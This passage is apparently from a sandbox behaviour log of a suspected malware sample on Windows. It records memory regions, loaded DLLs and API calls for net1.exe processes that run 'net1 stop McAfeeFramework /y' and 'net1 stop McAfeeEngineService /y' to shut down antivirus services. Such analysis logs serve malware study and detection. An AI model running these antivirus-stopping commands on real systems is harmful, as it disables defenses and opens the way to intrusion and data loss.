0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6452 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6453 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6454 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6455 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6456 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6457 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6458 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6459 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 556 os_tid = 0x1108 Process: id = "138" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x609f9000" os_pid = "0x1110" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "130" os_parent_pid = "0x10e8" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6215 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6218 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6219 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6220 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6221 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6222 start_va = 0xff660000 end_va = 0xff692fff entry_point = 0xff660000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6223 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6224 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6225 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6226 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6227 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 6228 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6229 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6230 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6231 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6232 start_va = 0x180000 end_va = 0x1e6fff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6233 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 6234 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6235 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6236 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6237 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6238 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6239 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6240 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6241 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6242 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6243 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6244 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6245 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6246 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6247 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6248 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6249 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6250 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6251 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6252 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6321 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 558 os_tid = 0x11a4 [0099.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fb70 | out: lpSystemTimeAsFileTime=0x26fb70*(dwLowDateTime=0xf043c610, dwHighDateTime=0x1d48689)) [0099.149] GetCurrentProcessId () returned 0x1110 [0099.149] GetCurrentThreadId () returned 0x11a4 [0099.149] GetTickCount () returned 0x22931 [0099.149] QueryPerformanceCounter (in: lpPerformanceCount=0x26fb78 | out: lpPerformanceCount=0x26fb78*=1814606700000) returned 1 [0099.150] GetModuleHandleW (lpModuleName=0x0) returned 0xff660000 [0099.150] __set_app_type (_Type=0x1) [0099.151] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff679c9c) returned 0x0 [0099.151] __getmainargs (in: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788, _DoWildCard=0, _StartInfo=0xff68479c | out: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788) returned 0 [0099.151] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.151] GetConsoleOutputCP () returned 0x1b5 [0099.151] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff68cec0 | out: lpCPInfo=0xff68cec0) returned 1 [0099.151] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.153] sprintf_s (in: _DstBuf=0x26fb18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.153] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.154] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.154] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.154] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFramework /y" [0099.154] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f8b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0099.155] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.155] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fb08 | out: Buffer=0x26fb08*=0x94d50) returned 0x0 [0099.155] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fb08 | out: Buffer=0x26fb08*=0x9c100) returned 0x0 [0099.155] _fileno (_File=0x7fefdba2a80) returned 0 [0099.155] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0099.155] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0099.155] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0099.155] _wcsicmp (_String1="config", _String2="stop") returned -16 [0099.155] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0099.155] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0099.155] _wcsicmp (_String1="file", _String2="stop") returned -13 [0099.155] _wcsicmp (_String1="files", _String2="stop") returned -13 [0099.155] _wcsicmp (_String1="group", _String2="stop") returned -12 [0099.155] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0099.155] _wcsicmp (_String1="help", _String2="stop") returned -11 [0099.155] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0099.155] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0099.155] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0099.155] _wcsicmp (_String1="session", _String2="stop") returned -15 [0099.155] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0099.155] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0099.155] _wcsicmp (_String1="share", _String2="stop") returned -12 [0099.156] _wcsicmp (_String1="start", _String2="stop") returned -14 [0099.156] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0099.156] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0099.156] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0099.156] _wcsicmp (_String1="accounts", _String2="McAfeeFramework") returned -12 [0099.156] _wcsicmp (_String1="computer", _String2="McAfeeFramework") returned -10 [0099.156] _wcsicmp (_String1="config", _String2="McAfeeFramework") returned -10 [0099.156] _wcsicmp (_String1="continue", _String2="McAfeeFramework") returned -10 [0099.156] _wcsicmp (_String1="cont", _String2="McAfeeFramework") returned -10 [0099.156] _wcsicmp (_String1="file", _String2="McAfeeFramework") returned -7 [0099.156] _wcsicmp (_String1="files", _String2="McAfeeFramework") returned -7 [0099.156] _wcsicmp (_String1="group", _String2="McAfeeFramework") returned -6 [0099.156] _wcsicmp (_String1="groups", _String2="McAfeeFramework") returned -6 [0099.156] _wcsicmp (_String1="help", _String2="McAfeeFramework") returned -5 [0099.156] _wcsicmp (_String1="helpmsg", _String2="McAfeeFramework") returned -5 [0099.156] _wcsicmp (_String1="localgroup", _String2="McAfeeFramework") returned -1 [0099.156] _wcsicmp (_String1="pause", _String2="McAfeeFramework") returned 3 [0099.156] _wcsicmp (_String1="session", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="sessions", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="sess", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="share", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="start", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="stats", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="statistics", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="stop", _String2="McAfeeFramework") returned 6 [0099.156] _wcsicmp (_String1="time", _String2="McAfeeFramework") returned 7 [0099.156] _wcsicmp (_String1="user", _String2="McAfeeFramework") returned 8 [0099.156] _wcsicmp (_String1="users", _String2="McAfeeFramework") returned 8 [0099.156] _wcsicmp (_String1="msg", _String2="McAfeeFramework") returned 16 [0099.156] _wcsicmp (_String1="messenger", _String2="McAfeeFramework") returned 2 [0099.157] _wcsicmp (_String1="receiver", _String2="McAfeeFramework") returned 5 [0099.157] _wcsicmp (_String1="rcv", _String2="McAfeeFramework") returned 5 [0099.157] _wcsicmp (_String1="netpopup", _String2="McAfeeFramework") returned 1 [0099.157] _wcsicmp (_String1="redirector", _String2="McAfeeFramework") returned 5 [0099.157] _wcsicmp (_String1="redir", _String2="McAfeeFramework") returned 5 [0099.157] _wcsicmp (_String1="rdr", _String2="McAfeeFramework") returned 5 [0099.157] _wcsicmp (_String1="workstation", _String2="McAfeeFramework") returned 10 [0099.157] _wcsicmp (_String1="work", _String2="McAfeeFramework") returned 10 [0099.157] _wcsicmp (_String1="wksta", _String2="McAfeeFramework") returned 10 [0099.157] _wcsicmp (_String1="prdr", _String2="McAfeeFramework") returned 3 [0099.157] _wcsicmp (_String1="devrdr", _String2="McAfeeFramework") returned -9 [0099.157] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeFramework") returned -1 [0099.157] _wcsicmp (_String1="server", _String2="McAfeeFramework") returned 6 [0099.157] _wcsicmp (_String1="svr", _String2="McAfeeFramework") returned 6 [0099.157] _wcsicmp (_String1="srv", _String2="McAfeeFramework") returned 6 [0099.157] _wcsicmp (_String1="lanmanserver", _String2="McAfeeFramework") returned -1 [0099.157] _wcsicmp (_String1="alerter", _String2="McAfeeFramework") returned -12 [0099.157] _wcsicmp (_String1="netlogon", _String2="McAfeeFramework") returned 1 [0099.157] _wcsupr (in: _String="McAfeeFramework" | out: _String="MCAFEEFRAMEWORK") returned="MCAFEEFRAMEWORK" [0099.157] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9ce10 [0099.254] GetServiceKeyNameW (in: hSCManager=0x9ce10, lpDisplayName="MCAFEEFRAMEWORK", lpServiceName=0xff685750, lpcchBuffer=0x26fa28 | out: lpServiceName="", lpcchBuffer=0x26fa28) returned 0 [0099.255] _wcsicmp (_String1="msg", _String2="MCAFEEFRAMEWORK") returned 16 [0099.255] _wcsicmp (_String1="messenger", _String2="MCAFEEFRAMEWORK") returned 2 [0099.255] _wcsicmp (_String1="receiver", _String2="MCAFEEFRAMEWORK") returned 5 [0099.255] _wcsicmp (_String1="rcv", _String2="MCAFEEFRAMEWORK") returned 5 [0099.255] _wcsicmp (_String1="redirector", _String2="MCAFEEFRAMEWORK") returned 5 [0099.256] _wcsicmp (_String1="redir", _String2="MCAFEEFRAMEWORK") returned 5 [0099.256] _wcsicmp (_String1="rdr", _String2="MCAFEEFRAMEWORK") returned 5 [0099.256] _wcsicmp (_String1="workstation", _String2="MCAFEEFRAMEWORK") returned 10 [0099.256] _wcsicmp (_String1="work", _String2="MCAFEEFRAMEWORK") returned 10 [0099.256] _wcsicmp (_String1="wksta", _String2="MCAFEEFRAMEWORK") returned 10 [0099.256] _wcsicmp (_String1="prdr", _String2="MCAFEEFRAMEWORK") returned 3 [0099.256] _wcsicmp (_String1="devrdr", _String2="MCAFEEFRAMEWORK") returned -9 [0099.256] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEFRAMEWORK") returned -1 [0099.256] _wcsicmp (_String1="server", _String2="MCAFEEFRAMEWORK") returned 6 [0099.256] _wcsicmp (_String1="svr", _String2="MCAFEEFRAMEWORK") returned 6 [0099.256] _wcsicmp (_String1="srv", _String2="MCAFEEFRAMEWORK") returned 6 [0099.256] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEFRAMEWORK") returned -1 [0099.256] _wcsicmp (_String1="alerter", _String2="MCAFEEFRAMEWORK") returned -12 [0099.256] _wcsicmp (_String1="netlogon", _String2="MCAFEEFRAMEWORK") returned 1 [0099.256] NetServiceControl (in: servername=0x0, service="MCAFEEFRAMEWORK", opcode=0x0, arg=0x0, bufptr=0x26fa30 | out: bufptr=0x26fa30) returned 0x889 [0099.257] wcscpy_s (in: _Destination=0xff6880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.257] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0099.258] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0099.259] GetFileType (hFile=0xb) returned 0x2 [0099.259] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8f8 | out: lpMode=0x26f8f8) returned 1 [0099.259] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f8f0, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x26f8f0*=0x1e) returned 1 [0099.260] GetFileType (hFile=0xb) returned 0x2 [0099.260] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8f8 | out: lpMode=0x26f8f8) returned 1 [0099.260] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f8f0, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x26f8f0*=0x2) returned 1 [0099.260] _ultow (in: _Dest=0x889, _Radix=2554208 | out: _Dest=0x889) returned="2185" [0099.261] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0099.261] GetFileType (hFile=0xb) returned 0x2 [0099.261] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8f8 | out: lpMode=0x26f8f8) returned 1 [0099.261] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f8f0, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x26f8f0*=0x34) returned 1 [0099.261] GetFileType (hFile=0xb) returned 0x2 [0099.262] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f8f8 | out: lpMode=0x26f8f8) returned 1 [0099.262] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f8f0, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x26f8f0*=0x2) returned 1 [0099.263] NetApiBufferFree (Buffer=0x94d50) returned 0x0 [0099.263] NetApiBufferFree (Buffer=0x9c100) returned 0x0 [0099.263] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFramework /y" [0099.263] exit (_Code=2) Process: id = "139" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x612ed000" os_pid = "0x1158" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "129" os_parent_pid = "0xdf0" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6253 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6254 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6255 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6256 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6257 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6258 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6259 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6260 start_va = 0xff660000 end_va = 0xff692fff entry_point = 0xff660000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6261 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6262 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6263 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 6264 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6265 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6266 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6267 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6322 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6323 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6324 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6325 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6326 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 6327 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6328 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6329 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6330 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6331 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6332 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6333 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6334 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6335 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = 